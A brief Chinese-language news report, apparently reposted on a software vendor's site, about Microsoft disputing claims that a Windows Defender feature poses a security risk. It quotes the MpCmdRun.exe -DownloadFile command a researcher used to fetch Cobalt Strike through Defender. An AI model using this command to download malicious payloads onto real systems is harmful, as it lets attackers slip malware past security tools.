微软回应新功能存在安全风险问题
鼎聚科创/行业资讯/Sep 7, 2020微软回应新功能存在安全风险问题
据消息 微软否认 Windows Defender 新功能存在安全风险,现已通过声明回应称:
尽管有这些报道,Microsoft Defender 防病毒软件与 Microsoft Defender ATP 仍将保护客户免受恶意软件的侵害。这些程序会检测通过防病毒文件下载功能下载到系统的恶意文件。
微软还表示,该功能不能用于特权升级。
据了解,Askar 此前表示,Microsoft Defender 命令行工具支持新的 “ -DownloadFile”功能。攻击者可以使用 Microsoft 反恶意软件服务命令行实用程序通过以下命令从 Internet 下载文件:“ MpCmdRun.exe -DownloadFile -url <url> -path >local-path>” 。
通过这一途径,Askar 能够直接通过 Microsoft Defender 从远程位置下载 Cobalt Strike 恶意软件。
此文章来自腾讯、新浪
商城系统开发|软件定制开发|o2o商城系统|微信定制开发|系统定制-逸锐科技
